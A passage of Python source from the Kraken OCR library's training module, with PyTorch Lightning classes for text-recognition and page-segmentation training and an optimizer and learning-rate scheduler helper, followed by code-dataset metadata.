{self.train_set.dataset.im_mode} data. Consider setting `force_binarization`')\n\n if self.format_type != 'path' and self.nn.seg_type == 'bbox':\n logger.warning('Neural network has been trained on bounding box image information but training set is polygonal.')\n\n self.nn.hyper_params = self.hparams\n self.nn.model_type = 'recognition'\n\n if not self.nn.seg_type:\n logger.info(f'Setting seg_type to {self.train_set.dataset.seg_type}.')\n self.nn.seg_type = self.train_set.dataset.seg_type\n\n self.rec_nn = models.TorchSeqRecognizer(self.nn, train=None, device=None)\n self.net = self.nn.nn\n\n torch.set_num_threads(max(self.num_workers, 1))\n\n def train_dataloader(self):\n return DataLoader(self.train_set,\n batch_size=self.hparams.batch_size,\n num_workers=self.num_workers,\n pin_memory=True,\n shuffle=True,\n collate_fn=collate_sequences)\n\n def val_dataloader(self):\n return DataLoader(self.val_set,\n shuffle=False,\n batch_size=self.hparams.batch_size,\n num_workers=self.num_workers,\n pin_memory=True,\n collate_fn=collate_sequences)\n\n def configure_callbacks(self):\n callbacks = []\n if self.hparams.quit == 'early':\n callbacks.append(EarlyStopping(monitor='val_accuracy',\n mode='max',\n patience=self.hparams.lag,\n stopping_threshold=1.0))\n return callbacks\n\n # configuration of optimizers and learning rate schedulers\n # --------------------------------------------------------\n #\n # All schedulers are created internally with a frequency of step to enable\n # batch-wise learning rate warmup. In lr_scheduler_step() calls to the\n # scheduler are then only performed at the end of the epoch.\n def configure_optimizers(self):\n return _configure_optimizer_and_lr_scheduler(self.hparams,\n self.nn.nn.parameters(),\n len_train_set=len(self.train_set),\n loss_tracking_mode='max')\n\n def optimizer_step(self, epoch, batch_idx, optimizer, optimizer_idx,\n optimizer_closure, on_tpu=False, using_native_amp=False,\n using_lbfgs=False):\n # update params\n optimizer.step(closure=optimizer_closure)\n\n # linear warmup between 0 and the initial learning rate `lrate` in `warmup`\n # steps.\n if self.hparams.warmup and self.trainer.global_step < self.hparams.warmup:\n lr_scale = min(1.0, float(self.trainer.global_step + 1) / self.hparams.warmup)\n for pg in optimizer.param_groups:\n pg[\"lr\"] = lr_scale * self.hparams.lrate\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if not self.hparams.warmup or self.trainer.global_step >= self.hparams.warmup:\n # step OneCycleLR each batch if not in warmup phase\n if isinstance(scheduler, lr_scheduler.OneCycleLR):\n scheduler.step()\n # step every other scheduler epoch-wise\n elif self.trainer.is_last_batch:\n scheduler.step()\n\n\nclass SegmentationModel(pl.LightningModule):\n def __init__(self,\n hyper_params: Dict = None,\n load_hyper_parameters: bool = False,\n progress_callback: Callable[[str, int], Callable[[None], None]] = lambda string, length: lambda: None,\n message: Callable[[str], None] = lambda *args, **kwargs: None,\n output: str = 'model',\n spec: str = default_specs.SEGMENTATION_SPEC,\n model: Optional[Union[pathlib.Path, str]] = None,\n training_data: Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]] = None,\n evaluation_data: Optional[Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]]] = None,\n partition: Optional[float] = 0.9,\n num_workers: int = 1,\n force_binarization: bool = False,\n format_type: str = 'path',\n suppress_regions: bool = False,\n suppress_baselines: bool = False,\n valid_regions: Optional[Sequence[str]] = None,\n valid_baselines: Optional[Sequence[str]] = None,\n merge_regions: Optional[Dict[str, str]] = None,\n merge_baselines: Optional[Dict[str, str]] = None,\n bounding_regions: Optional[Sequence[str]] = None,\n resize: str = 'fail',\n topline: Union[bool, None] = False):\n \"\"\"\n A LightningModule encapsulating the training setup for a page\n segmentation model.\n\n Setup parameters (load, training_data, evaluation_data, ....) are\n named, model hyperparameters (everything in\n `kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS`) are in in the\n `hyper_params` argument.\n\n Args:\n hyper_params (dict): Hyperparameter dictionary containing all fields\n from\n kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS\n **kwargs: Setup parameters, i.e. CLI parameters of the segtrain() command.\n \"\"\"\n\n super().__init__()\n\n self.best_epoch = 0\n self.best_metric = 0.0\n\n self.model = model\n self.num_workers = num_workers\n self.resize = resize\n self.format_type = format_type\n self.output = output\n self.bounding_regions = bounding_regions\n self.topline = topline\n\n hyper_params_ = default_specs.SEGMENTATION_HYPER_PARAMS\n\n if model:\n logger.info(f'Loading existing model from {model}')\n self.nn = vgsl.TorchVGSLModel.load_model(model)\n\n if self.nn.model_type not in [None, 'segmentation']:\n raise ValueError(f'Model {model} is of type {self.nn.model_type} while `segmentation` is expected.')\n\n if load_hyper_parameters:\n hp = self.nn.hyper_params\n else:\n hp = {}\n hyper_params_.update(hp)\n batch, channels, height, width = self.nn.input\n else:\n self.nn = None\n\n spec = spec.strip()\n if spec[0] != '[' or spec[-1] != ']':\n raise ValueError(f'VGSL spec \"{spec}\" not bracketed')\n self.spec = spec\n blocks = spec[1:-1].split(' ')\n m = re.match(r'(\\d+),(\\d+),(\\d+),(\\d+)', blocks[0])\n if not m:\n raise ValueError(f'Invalid input spec {blocks[0]}')\n batch, height, width, channels = [int(x) for x in m.groups()]\n\n if hyper_params:\n hyper_params_.update(hyper_params)\n\n validate_hyper_parameters(hyper_params_)\n self.save_hyperparameters(hyper_params_)\n\n if not training_data:\n raise ValueError('No training data provided. Please add some.')\n\n transforms = ImageInputTransforms(batch, height, width, channels, 0, valid_norm=False, force_binarization=force_binarization)\n\n self.example_input_array = torch.Tensor(batch,\n channels,\n height if height else 400,\n width if width else 300)\n\n # set multiprocessing tensor sharing strategy\n if 'file_system' in torch.multiprocessing.get_all_sharing_strategies():\n logger.debug('Setting multiprocessing tensor sharing strategy to file_system')\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n if not valid_regions:\n valid_regions = None\n if not valid_baselines:\n valid_baselines = None\n\n if suppress_regions:\n valid_regions = []\n merge_regions = None\n if suppress_baselines:\n valid_baselines = []\n merge_baselines = None\n\n train_set = BaselineSet(training_data,\n line_width=self.hparams.line_width,\n im_transforms=transforms,\n mode=format_type,\n augmentation=self.hparams.augment,\n valid_baselines=valid_baselines,\n merge_baselines=merge_baselines,\n valid_regions=valid_regions,\n merge_regions=merge_regions)\n\n if format_type is None:\n for page in training_data:\n train_set.add(**page)\n\n if evaluation_data:\n val_set = BaselineSet(evaluation_data,\n line_width=self.hparams.line_width,\n im_transforms=transforms,\n mode=format_type,\n augmentation=False,\n valid_baselines=valid_baselines,\n merge_baselines=merge_baselines,\n valid_regions=valid_regions,\n merge_regions=merge_regions)\n\n if format_type is None:\n for page in evaluation_data:\n val_set.add(**page)\n\n train_set = Subset(train_set, range(len(train_set)))\n val_set = Subset(val_set, range(len(val_set)))\n else:\n train_len = int(len(train_set)*partition)\n val_len = len(train_set) - train_len\n logger.info(f'No explicit validation data provided. Splitting off '\n f'{val_len} (of {len(train_set)}) samples to validation '\n 'set.')\n train_set, val_set = random_split(train_set, (train_len, val_len))\n\n if len(train_set) == 0:\n raise ValueError('No valid training data provided. Please add some.')\n\n if len(val_set) == 0:\n raise ValueError('No valid validation data provided. Please add some.')\n\n # overwrite class mapping in validation set\n val_set.dataset.num_classes = train_set.dataset.num_classes\n val_set.dataset.class_mapping = train_set.dataset.class_mapping\n\n self.train_set = train_set\n self.val_set = val_set\n\n def forward(self, x):\n return self.nn.nn(x)\n\n def training_step(self, batch, batch_idx):\n input, target = batch['image'], batch['target']\n output, _ = self.nn.nn(input)\n output = F.interpolate(output, size=(target.size(2), target.size(3)))\n loss = self.nn.criterion(output, target)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch['image'], batch['target']\n pred, _ = self.nn.nn(x)\n # scale target to output size\n y = F.interpolate(y, size=(pred.size(2), pred.size(3))).squeeze(0).bool()\n pred = pred.squeeze() > 0.3\n pred = pred.view(pred.size(0), -1)\n y = y.view(y.size(0), -1)\n\n return {'intersections': (y & pred).sum(dim=1, dtype=torch.double),\n 'unions': (y | pred).sum(dim=1, dtype=torch.double),\n 'corrects': torch.eq(y, pred).sum(dim=1, dtype=torch.double),\n 'cls_cnt': y.sum(dim=1, dtype=torch.double),\n 'all_n': torch.tensor(y.size(1), dtype=torch.double, device=self.device)}\n\n def validation_epoch_end(self, outputs):\n smooth = torch.finfo(torch.float).eps\n\n intersections = torch.stack([x['intersections'] for x in outputs]).sum()\n unions = torch.stack([x['unions'] for x in outputs]).sum()\n corrects = torch.stack([x['corrects'] for x in outputs]).sum()\n cls_cnt = torch.stack([x['cls_cnt'] for x in outputs]).sum()\n all_n = torch.stack([x['all_n'] for x in outputs]).sum()\n\n # all_positives = tp + fp\n # actual_positives = tp + fn\n # true_positivies = tp\n pixel_accuracy = corrects.sum() / all_n.sum()\n mean_accuracy = torch.mean(corrects / all_n)\n iu = (intersections + smooth) / (unions + smooth)\n mean_iu = torch.mean(iu)\n freq_iu = torch.sum(cls_cnt / cls_cnt.sum() * iu)\n\n if mean_iu > self.best_metric:\n logger.debug(f'Updating best metric from {self.best_metric} ({self.best_epoch}) to {mean_iu} ({self.current_epoch})')\n self.best_epoch = self.current_epoch\n self.best_metric = mean_iu\n\n logger.info(f'validation run: accuracy {pixel_accuracy} mean_acc {mean_accuracy} mean_iu {mean_iu} freq_iu {freq_iu}')\n self.log_dict({'val_accuracy': pixel_accuracy,\n 'val_mean_acc': mean_accuracy,\n 'val_mean_iu': mean_iu,\n 'val_freq_iu': freq_iu,\n 'val_metric': mean_iu}, prog_bar=True)\n\n def setup(self, stage: Optional[str] = None):\n # finalize models in case of appending/loading\n if stage in [None, 'fit']:\n if not self.model:\n self.spec = f'[{self.spec[1:-1]} O2l{self.train_set.dataset.num_classes}]'\n logger.info(f'Creating model {self.spec} with {self.train_set.dataset.num_classes} outputs ', nl=False)\n nn = vgsl.TorchVGSLModel(self.spec)\n if self.bounding_regions is not None:\n nn.user_metadata['bounding_regions'] = self.bounding_regions\n nn.user_metadata['topline'] = self.topline\n self.nn = nn\n else:\n if self.train_set.dataset.class_mapping['baselines'].keys() != self.nn.user_metadata['class_mapping']['baselines'].keys() or \\\n self.train_set.dataset.class_mapping['regions'].keys() != self.nn.user_metadata['class_mapping']['regions'].keys():\n\n bl_diff = set(self.train_set.dataset.class_mapping['baselines'].keys()).symmetric_difference(\n set(self.nn.user_metadata['class_mapping']['baselines'].keys()))\n regions_diff = set(self.train_set.dataset.class_mapping['regions'].keys()).symmetric_difference(\n set(self.nn.user_metadata['class_mapping']['regions'].keys()))\n\n if self.resize == 'fail':\n raise ValueError(f'Training data and model class mapping differ (bl: {bl_diff}, regions: {regions_diff}')\n elif self.resize == 'add':\n new_bls = self.train_set.dataset.class_mapping['baselines'].keys() - self.nn.user_metadata['class_mapping']['baselines'].keys()\n new_regions = self.train_set.dataset.class_mapping['regions'].keys() - self.nn.user_metadata['class_mapping']['regions'].keys()\n cls_idx = max(max(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else -1,\n max(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else -1)\n logger.info(f'Adding {len(new_bls) + len(new_regions)} missing types to network output layer.')\n self.nn.resize_output(cls_idx + len(new_bls) + len(new_regions) + 1)\n for c in new_bls:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['baselines'][c] = cls_idx\n for c in new_regions:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['regions'][c] = cls_idx\n elif self.resize == 'both':\n logger.info('Fitting network exactly to training set.')\n new_bls = self.train_set.dataset.class_mapping['baselines'].keys() - self.nn.user_metadata['class_mapping']['baselines'].keys()\n new_regions = self.train_set.dataset.class_mapping['regions'].keys() - self.nn.user_metadata['class_mapping']['regions'].keys()\n del_bls = self.nn.user_metadata['class_mapping']['baselines'].keys() - self.train_set.dataset.class_mapping['baselines'].keys()\n del_regions = self.nn.user_metadata['class_mapping']['regions'].keys() - self.train_set.dataset.class_mapping['regions'].keys()\n\n logger.info(f'Adding {len(new_bls) + len(new_regions)} missing '\n f'types and removing {len(del_bls) + len(del_regions)} to network output layer ')\n cls_idx = max(max(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else -1,\n max(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else -1)\n\n del_indices = [self.nn.user_metadata['class_mapping']['baselines'][x] for x in del_bls]\n del_indices.extend(self.nn.user_metadata['class_mapping']['regions'][x] for x in del_regions)\n self.nn.resize_output(cls_idx + len(new_bls) + len(new_regions) -\n len(del_bls) - len(del_regions) + 1, del_indices)\n\n # delete old baseline/region types\n cls_idx = min(min(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else np.inf,\n min(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else np.inf)\n\n bls = {}\n for k, v in sorted(self.nn.user_metadata['class_mapping']['baselines'].items(), key=lambda item: item[1]):\n if k not in del_bls:\n bls[k] = cls_idx\n cls_idx += 1\n\n regions = {}\n for k, v in sorted(self.nn.user_metadata['class_mapping']['regions'].items(), key=lambda item: item[1]):\n if k not in del_regions:\n regions[k] = cls_idx\n cls_idx += 1\n\n self.nn.user_metadata['class_mapping']['baselines'] = bls\n self.nn.user_metadata['class_mapping']['regions'] = regions\n\n # add new baseline/region types\n cls_idx -= 1\n for c in new_bls:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['baselines'][c] = cls_idx\n for c in new_regions:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['regions'][c] = cls_idx\n else:\n raise ValueError(f'invalid resize parameter value {self.resize}')\n # backfill train_set/val_set mapping if key-equal as the actual\n # numbering in the train_set might be different\n self.train_set.dataset.class_mapping = self.nn.user_metadata['class_mapping']\n self.val_set.dataset.class_mapping = self.nn.user_metadata['class_mapping']\n\n # updates model's hyper params with user-defined ones\n self.nn.hyper_params = self.hparams\n\n # change topline/baseline switch\n loc = {None: 'centerline',\n True: 'topline',\n False: 'baseline'}\n\n if 'topline' not in self.nn.user_metadata:\n logger.warning(f'Setting baseline location to {loc[self.topline]} from unset model.')\n elif self.nn.user_metadata['topline'] != self.topline:\n from_loc = loc[self.nn.user_metadata['topline']]\n logger.warning(f'Changing baseline location from {from_loc} to {loc[self.topline]}.')\n self.nn.user_metadata['topline'] = self.topline\n\n logger.info('Training line types:')\n for k, v in self.train_set.dataset.class_mapping['baselines'].items():\n logger.info(f' {k}\\t{v}\\t{self.train_set.dataset.class_stats[\"baselines\"][k]}')\n logger.info('Training region types:')\n for k, v in self.train_set.dataset.class_mapping['regions'].items():\n logger.info(f' {k}\\t{v}\\t{self.train_set.dataset.class_stats[\"regions\"][k]}')\n\n if len(self.train_set) == 0:\n raise ValueError('No valid training data was provided to the train command. Please add valid XML data.')\n\n # set model type metadata field and dump class_mapping\n self.nn.model_type = 'segmentation'\n self.nn.user_metadata['class_mapping'] = self.val_set.dataset.class_mapping\n\n # for model size/trainable parameter output\n self.net = self.nn.nn\n\n torch.set_num_threads(max(self.num_workers, 1))\n\n def train_dataloader(self):\n return DataLoader(self.train_set,\n batch_size=1,\n num_workers=self.num_workers,\n shuffle=True,\n pin_memory=True)\n\n def val_dataloader(self):\n return DataLoader(self.val_set,\n shuffle=False,\n batch_size=1,\n num_workers=self.num_workers,\n pin_memory=True)\n\n def configure_callbacks(self):\n callbacks = []\n if self.hparams.quit == 'early':\n callbacks.append(EarlyStopping(monitor='val_mean_iu',\n mode='max',\n patience=self.hparams.lag,\n stopping_threshold=1.0))\n\n return callbacks\n\n # configuration of optimizers and learning rate schedulers\n # --------------------------------------------------------\n #\n # All schedulers are created internally with a frequency of step to enable\n # batch-wise learning rate warmup. In lr_scheduler_step() calls to the\n # scheduler are then only performed at the end of the epoch.\n def configure_optimizers(self):\n return _configure_optimizer_and_lr_scheduler(self.hparams,\n self.nn.nn.parameters(),\n len_train_set=len(self.train_set),\n loss_tracking_mode='max')\n\n def optimizer_step(self, epoch, batch_idx, optimizer, optimizer_idx,\n optimizer_closure, on_tpu=False, using_native_amp=False,\n using_lbfgs=False):\n # update params\n optimizer.step(closure=optimizer_closure)\n\n # linear warmup between 0 and the initial learning rate `lrate` in `warmup`\n # steps.\n if self.hparams.warmup and self.trainer.global_step < self.hparams.warmup:\n lr_scale = min(1.0, float(self.trainer.global_step + 1) / self.hparams.warmup)\n for pg in optimizer.param_groups:\n pg[\"lr\"] = lr_scale * self.hparams.lrate\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if not self.hparams.warmup or self.trainer.global_step >= self.hparams.warmup:\n # step OneCycleLR each batch if not in warmup phase\n if isinstance(scheduler, lr_scheduler.OneCycleLR):\n scheduler.step()\n # step every other scheduler epoch-wise\n elif self.trainer.is_last_batch:\n scheduler.step()\n\n\ndef _configure_optimizer_and_lr_scheduler(hparams, params, len_train_set=None, loss_tracking_mode='max'):\n # XXX: Warmup is not configured here because it needs to be manually done in optimizer_step()\n logger.debug(f'Constructing {hparams.optimizer} optimizer (lr: {hparams.lrate}, momentum: {hparams.momentum})')\n if hparams.optimizer == 'Adam':\n optim = torch.optim.Adam(params, lr=hparams.lrate, weight_decay=hparams.weight_decay)\n else:\n optim = getattr(torch.optim, hparams.optimizer)(params,\n lr=hparams.lrate,\n momentum=hparams.momentum,\n weight_decay=hparams.weight_decay)\n lr_sched = {}\n if hparams.schedule == 'exponential':\n lr_sched = {'scheduler': lr_scheduler.ExponentialLR(optim, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'cosine':\n lr_sched = {'scheduler': lr_scheduler.CosineAnnealingLR(optim, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'step':\n lr_sched = {'scheduler': lr_scheduler.StepLR(optim, hparams.step_size, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'reduceonplateau':\n lr_sched = {'scheduler': lr_scheduler.ReduceLROnPlateau(optim,\n mode=loss_tracking_mode,\n factor=hparams.rop_factor,\n patience=hparams.rop_patience),\n 'interval': 'step'}\n elif hparams.schedule == '1cycle':\n if hparams.epochs <= 0:\n raise ValueError('1cycle learning rate scheduler selected but '\n 'number of epochs is less than 0 '\n f'({hparams.epochs}).')\n last_epoch = hparams.completed_epochs*len_train_set if hparams.completed_epochs else -1\n lr_sched = {'scheduler': lr_scheduler.OneCycleLR(optim,\n max_lr=hparams.lrate,\n epochs=hparams.epochs,\n steps_per_epoch=len_train_set,\n last_epoch=last_epoch),\n 'interval': 'step'}\n elif hparams.schedule != 'constant':\n raise ValueError(f'Unsupported learning rate scheduler {hparams.schedule}.')\n\n if lr_sched:\n lr_sched['monitor'] = 'val_metric'\n\n return [optim], lr_sched if lr_sched else []\n", "sub_path": "kraken/lib/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 50671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 47, "usage_type": "call"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 55, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 60, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 66, "usage_type": "name"}, {"api_name": "kraken.lib.progress.KrakenTrainProgressBar", "line_number": 81, "usage_type": "call"}, {"api_name": "kraken.lib.progress", "line_number": 81, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.RichModelSummary", "line_number": 86, "usage_type": "call"}, {"api_name": "warnings.catch_warnings", "line_number": 94, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 95, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.Callback", "line_number": 100, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.Callback", "line_number": 116, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 131, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 137, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 139, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 140, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 148, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.RECOGNITION_SPEC", "line_number": 135, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 135, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS", "line_number": 166, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 166, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel.load_model", "line_number": 169, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 169, "usage_type": "attribute"}, {"api_name": "kraken.lib.vgsl", "line_number": 169, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.GroundTruthDataset", "line_number": 197, "usage_type": "name"}, {"api_name": "kraken.lib.xml.preparse_xml_data", "line_number": 201, "usage_type": "call"}, {"api_name": "kraken.lib.xml.preparse_xml_data", "line_number": 204, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.PolygonGTDataset", "line_number": 208, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.ArrowIPCRecognitionDataset", "line_number": 211, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.PolygonGTDataset", "line_number": 238, "usage_type": "name"}, {"api_name": "re.match", "line_number": 260, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.ImageInputTransforms", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.multiprocessing.get_all_sharing_strategies", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.multiprocessing.set_sharing_strategy", "line_number": 282, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 282, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Subset", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 288, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 302, "usage_type": "call"}, {"api_name": "kraken.lib.util.make_printable", "line_number": 321, "usage_type": "call"}, {"api_name": "kraken.lib.codec.PytorchCodec", "line_number": 328, "usage_type": "call"}, {"api_name": "kraken.lib.util.make_printable", "line_number": 330, "usage_type": "call"}, {"api_name": "torch.multiprocessing.Pool", "line_number": 351, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 352, "usage_type": "call"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 360, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 386, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.compute_error", "line_number": 396, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 397, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 398, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 402, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 403, "usage_type": "call"}, {"api_name": "torch.finfo", "line_number": 404, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 404, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 412, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenEncodeException", "line_number": 433, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 441, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 477, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl", "line_number": 477, "usage_type": "name"}, {"api_name": "kraken.lib.models.TorchSeqRecognizer", "line_number": 498, "usage_type": "call"}, {"api_name": "kraken.lib.models", "line_number": 498, "usage_type": "name"}, {"api_name": "torch.set_num_threads", "line_number": 501, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 504, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.collate_sequences", "line_number": 509, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 512, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.collate_sequences", "line_number": 517, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 522, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 556, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 556, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 563, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 565, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 567, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 568, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 571, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 571, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 571, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 572, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 572, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 573, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 573, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 574, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 581, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 581, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 582, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 582, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 583, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 583, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 584, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 584, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 586, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.SEGMENTATION_SPEC", "line_number": 570, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 570, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS", "line_number": 616, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 616, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel.load_model", "line_number": 620, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 620, "usage_type": "attribute"}, {"api_name": "kraken.lib.vgsl", "line_number": 620, "usage_type": "name"}, {"api_name": "re.match", "line_number": 639, "usage_type": "call"}, {"api_name": "kraken.lib.models.validate_hyper_parameters", "line_number": 647, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.ImageInputTransforms", "line_number": 653, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 655, "usage_type": "call"}, {"api_name": "torch.multiprocessing.get_all_sharing_strategies", "line_number": 661, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 661, "usage_type": "attribute"}, {"api_name": "torch.multiprocessing.set_sharing_strategy", "line_number": 663, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 663, "usage_type": "attribute"}, {"api_name": "kraken.lib.dataset.BaselineSet", "line_number": 677, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.BaselineSet", "line_number": 692, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 706, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 707, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 714, "usage_type": "call"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 735, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 735, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 743, "usage_type": 